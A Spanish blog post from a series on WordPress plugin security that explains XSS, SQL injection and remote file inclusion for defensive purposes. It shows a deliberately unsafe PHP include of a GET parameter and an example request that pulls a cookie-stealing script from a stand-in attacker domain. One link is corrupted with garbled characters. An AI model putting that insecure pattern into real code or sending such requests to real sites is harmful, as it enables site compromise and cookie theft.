Seguridad de Plugins WordPress: ¿Que es peligroso?

Esta semana empecé la serie de seguridad de plugins WordPress. Hemos establecido que la regla de oro en la seguridad web es comprobar los “gateways”. Y esto es vigilar las áreas de un sitio web que un atacante podría utilizar para enviar datos a tu web. Me gustaría ahondar mas en esto hoy.

El experto en soporte WordPress, Podz, pregunta en su blog, “¿Que es peligroso?

La respuesta está en comprender los vectores de ataque. Los vectores de ataque, tales como Scripts Cruzados, Inyecciones SQL e Inclusión de Fichero Remoto, son algunos de los métodos mas utilizados para atacar una web. Si entiendes los principios en los que se basan tendrás una mayor comprensión de lo que necesitas buscar en un plugin. Así que vamos a ello ¿no crees?.

Scripts Cruzados (XSS)

Los Scripts Cruzados han sido descritos por Network World como la “mayor amenaza de seguridad“. Scripts Cruzados es un término general que se refiere a la inyección de javascript en una página. Y como la zona javascript permite al navegador hacer una amplia variedad de cosas, incluyendo el potencial de ejecutar código en el sistema de archivos, permitir a un atacante un vector para conseguir meter ese código en tu ordenador o web es peligroso. Un ejemplo de XSS sería el fallo de Democracy 1.2. Un punto común de entrada de un XSS es un formulario HTML (formulario de contacto, tagboard, etc) o la barra de direcciones.

Inyección SQL

Desde un punto de vista de programación, la inyección SQL ocurre cuando la entrada desde el navegador (ya sea desde un formulario o la barra de direcciones o lo que sea) se filtra inadecuadamente para hacerla “segura” y luego alimenta directamente una base de datos. Este vector de ataque permitiría que el contenido de una web (que esté apoyado en bases de datos) sea alterado o incluso borrado. Podría también utilizarse en combinación con XSS para inyectar javascript malicioso o scripts de servidor en el contenido de una página.

Inclusión de Fichero Remoto

Un tercer vector de ataque que debería evitarse es la inclusión de fichero remoto. Esto es utilizar una función PHP ( <a href="http://us2.php.net/incm��VFR#��6�^ude()</a>) para insertar una pieza de código alojado en cualquier sitio y ejecutado en el servidor remoto. En otras palabras, un atacante puede escribir un pequeño script que registre direcciones IP, cookies, etc, y si puede incluir en la web un script PHP de su sitio, puede ofrecer información valiosa al atacante. La IFR suele encontrarse normalmente cuando una entrada de usuario (formulario, barra de direcciones) se incluye directamente en un include().

Por ejemplo, un enlace de este tipo: http://ejemplo.com/?page=about poddría tener algún código que facilite el contenido adecuado <?php include($_GET['page'].".php"); ?>. Este tipo de código descuidado es mas habitual de lo que te imaginas. La intención del desarrollador podría ser, en este ejemplo, incluir los contenidos de about.php en la página principal. Sin embargo, piensa que pasaría si mando esta petición a mi navegador:
http://ejemplo.com/?page=http://midominio.com/script_lectura_cookie_maliciosa
Entonces, su página estaría ejecutando en realidad esta orden:

Un asunto muy peligroso.

¿Como afecta esto a WordPress?

En los siguientes artículos de esta serie echaremos un vistazo a las implicaciones de seguridad específicas a los plugins de WordPress. Cualquier plugin que se use debería inspeccionarse inicialmente para ver si permite la interacción con el usuario. Si permite la interacción del usuario podría ser propenso a uno de estos ataques de vectores.

No asumas, no obstante, que un plugin que acepte interacción es peligroso. Es cuestión del código y el desarrollador ofrecer una entrada de usuario apropiada y segura.

Lee otros artículos de la serie sobre Seguridad en plugins WordPress:

  1. La regla de oro
  2. ¿Qué es peligroso?
  3. Combinaciones peligrosas
  4. Menos es más

AVISO: esta publicación es de hace dos años o más. Si es un código o un plugin podría no funcionar en las últimas versiones de WordPress, y si es una noticia podría estar ya obsoleta. Luego no digas que no te hemos avisado.

VALORA ESTE ARTÍCULO PARA MEJORAR LA CALIDAD DEL BLOG…
FlojitoNo está malEstá bienMe ha servidoFantástico (6 votos, promedio: 5,00 de 5)
Cargando…

Autor: Fernando Tellado

Fernando Tellado, apasionado de WordPress, profesor, consultor y ponente. Maquero cansino, padre de tres hijos y de una perrita Beagle, Bilbaíno de nacimiento, Español de corazón y ciudadano de donde me quieran. Autor del libro WordPress - La tela de la araña. Mi blog personal es Navegando con red, donde he crecido como escritor en la red y ofrezco mis visiones acerca de la Web 2.0 y la blogosfera.

Comparte esta entrada en
468 ad

Pin It on Pinterest

Share This
Ir al contenido